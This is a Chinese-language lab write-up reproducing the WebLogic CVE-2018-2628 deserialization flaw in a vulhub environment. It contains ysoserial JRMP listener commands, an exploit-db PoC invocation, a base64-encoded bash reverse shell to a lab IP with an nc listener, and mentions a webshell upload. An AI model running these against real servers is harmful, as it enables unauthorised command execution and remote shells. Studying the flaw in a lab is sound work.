CVE-2018-2628 Weblogic WLS Core Components 反序列化命令執行漏洞
0X00-引言
今晚路燈很亮,好像上面少個人
0X01-環境搭建
靶機:CentOS Linux 7
攻擊機:windows server 2016 && Kail
環境:vulhub
專案地址:https://github.com/vulhub/vulhub
搭建vulhub請訪問:空白centos7 64 搭建vulhub(詳細)
0X02-漏洞介紹
Oracle 2018年4月補丁中,修復了Weblogic Server WLS Core Components中出現的一個反序列化漏洞(CVE-2018-2628),該漏洞通過t3協議觸發,可導致未授權的使用者在遠端伺服器執行任意命令。
影響版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
0X03-漏洞復現
01-使用ysoserial開啟JRMP服務
下載ysoserial(0.0.6版的也可以):https://github.com/frohoff/ysoserial
java -cp ysoserial-0.0.5-all.jar ysoserial.exploit.JRMPListener 埠號 CommonsCollections1 "執行的命令"
02-執行POC
POC下載:https://www.exploit-db.com/exploits/44553
python cve-2018-2628.py 192.168.234.128 7001 ./ysoserial-0.0.5-all.jar 192.168.234.135 1099 JRMPClient
開啟的JRMP服務會接受到訊息
到映象裡面檢視是否建立flag.txt檔案
docker exec -it 映象ID /bin/sh #進入映象
03-反彈shell
01-第一種方法
由於 Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,需要進行一次編碼。
shell命令編碼:https://www.jackson-t.ca/runtime-exec-payloads.html
java -cp ysoserial-0.0.5-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNC4xMzUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" #開啟JRMP服務
nc -lvvp 1234 #監聽
python cve-2018-2628.py 192.168.234.128 7001 ./ysoserial-0.0.5-all.jar 192.168.234.135 1099 JRMPClient #執行指令碼
成功反彈
02-第二種方法
下載工具包(另一種方法):https://github.com/Lighird/CVE-2018-2628
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 8888 Jdk7u21 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNC4xMzUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'
java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.234.135:8888 | xxd -p | tr -d $'\n' && echo
複製結果-替換weblogic_poc.py中的payload
執行指令碼(python2)-成功反彈shell
0X04-工具檢測
工具地址:https://github.com/Liqunkit/LiqunKit_
01-測試
02-上傳檔案getshell
上傳的是哥斯拉生成的馬
0X05-免責宣告
僅供學習使用
0X06-參考
https://vulhub.org/#/environments/weblogic/CVE-2018-2628/
https://blog.csdn.net/xuandao_ahfengren/article/details/106597145